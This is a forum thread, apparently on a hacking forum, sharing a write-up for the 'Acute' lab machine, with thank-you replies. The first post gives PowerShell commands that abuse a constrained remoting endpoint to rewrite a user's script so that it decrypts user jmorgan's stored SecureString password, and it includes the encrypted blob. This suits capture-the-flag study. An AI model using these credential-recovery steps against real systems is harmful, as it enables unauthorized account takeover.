Return to forum

langetmama11 · June 19, 2022 at 3:07 PM

Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute

Hidden Content

You must register or login to view this content.

Edit: I have added my personal findings for those who want to reverse the SecureString of user jmorgan
This is for learning purposes
Do it after you pawn the box

Note: We cannot run much commands as the imonk user. We can check by running this

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {get-command}

We can use Set-Content. So we replace the last line in the powershell script on imonks user desktop

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {((cat "C:\Users\imonks\Desktop\wm.ps1") -replace 'Invoke-Command -ScriptBlock \{Get-Volume} -ComputerName Acute-PC01 -Credential \$creds','[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))') |set-content -path "C:\Users\imonks\Desktop\wm.ps1"}

We can cat the script to see if it was written

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {cat C:\Users\imonks\Desktop\wm.ps1}

Final Script should look like this

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))

After which we run it

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {C:\Users\imonks\Desktop\wm.ps1}

We have successfully decrypted the SecureString password

Note:
ConverTo-SecureString uses a key thus preventing us from decrypting the password on another machine
So we have to do it on the host only

Hope you learned something
Leave a Rep if that helped

mrzerocool · June 19, 2022 at 3:13 PM

(June 19, 2022, 03:07 PM)langetmama11 Wrote: Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute

Leave a Rep if that helped

it helps

wanderlust · June 19, 2022 at 6:35 PM

Thanks

hokagebaptis · June 19, 2022 at 6:40 PM

(June 19, 2022, 03:07 PM)langetmama11 Wrote: Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute

Leave a Rep if that helped

8urn · June 19, 2022 at 8:50 PM

(June 19, 2022, 03:07 PM)langetmama11 Wrote: Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute

Leave a Rep if that helped

ty

hoangviet88vn · June 20, 2022 at 4:17 AM

thanks :D

brubabes1922 · June 20, 2022 at 6:06 AM

Thanks for the share

langetmama11 · June 20, 2022 at 6:15 AM

I have updated the post which includes steps to reverse the secure string
Grab this knowledge

(June 19, 2022, 03:42 PM)Mefistogr Wrote: Thanks mate!

(June 20, 2022, 04:17 AM)hoangviet88vn Wrote: thanks :D

Post updated

AMUNRA · June 20, 2022 at 8:33 AM

Works great thanks

zondaime13 · June 20, 2022 at 8:46 AM

yeeeeeeee thx u